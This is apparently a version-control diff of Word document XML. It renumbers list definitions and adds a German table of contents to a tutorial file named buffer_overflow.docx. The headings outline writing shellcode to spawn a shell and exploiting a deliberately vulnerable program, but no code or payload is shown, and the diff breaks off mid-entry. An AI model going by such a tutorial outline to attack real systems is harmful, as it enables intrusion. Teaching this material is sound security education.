+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2">
     <w:nsid w:val="335F6FA2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="D21065DE"/>
@@ -6253,7 +7096,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2">
+  <w:abstractNum w:abstractNumId="3">
     <w:nsid w:val="51B3758A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2512A3B2"/>
@@ -6366,7 +7209,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3">
+  <w:abstractNum w:abstractNumId="4">
     <w:nsid w:val="54D36AF2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="402AFE5E"/>
@@ -6479,7 +7322,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4">
+  <w:abstractNum w:abstractNumId="5">
     <w:nsid w:val="646A0DD3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9496EAAE"/>
@@ -6592,7 +7435,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5">
+  <w:abstractNum w:abstractNumId="6">
     <w:nsid w:val="7456576A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="77AEE18C"/>
@@ -6706,22 +7549,25 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="2">
     <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="2">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="1"/>
+    <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="6">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>
@@ -8002,7 +8848,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B8FF6ECC-C66B-4ABB-A641-2E1E9082D712}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0257F427-D058-4861-B702-E149AE6585C1}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/buffer_overflow.docx
+++ b/buffer_overflow.docx
@@ -16,12 +16,2162 @@
         <w:t xml:space="preserve"> Overflow</w:t>
       </w:r>
     </w:p>
+    <w:sdt>
+      <w:sdtPr>
+        <w:id w:val="1349291835"/>
+        <w:docPartObj>
+          <w:docPartGallery w:val="Table of Contents"/>
+          <w:docPartUnique/>
+        </w:docPartObj>
+      </w:sdtPr>
+      <w:sdtEndPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:sdtEndPr>
+      <w:sdtContent>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhaltsverzeichnisberschrift"/>
+          </w:pPr>
+          <w:r>
+            <w:t>Inhalt</w:t>
+          </w:r>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:hyperlink w:anchor="_Toc339281403" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Buffer? Overlow?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281403 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281404" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Eine einfache angreifbare Funktion</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281404 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281405" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Remember Stack Layout</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281405 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281406" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Stack Layout unseres angreifbaren Programms</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281406 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281407" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Beobachtungen</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281407 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281408" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Shellcode</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281408 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281409" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Code in Shellcode umwandeln</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281409 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281410" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>ExitShellcode ausführen</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281410 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281411" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Shellcode zum Öffnen einer Shell schreiben</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281411 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281412" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Stack für execve() betrachten</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281412 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281413" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Assembler Equivalent</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281413 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281414" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Probleme mit diesem Shellcode</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281414 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281415" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Benutzbaren Shellcode für Execve() erstellen</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281415 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281416" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Exploiting des Programms ExploitMe.c</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281416 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
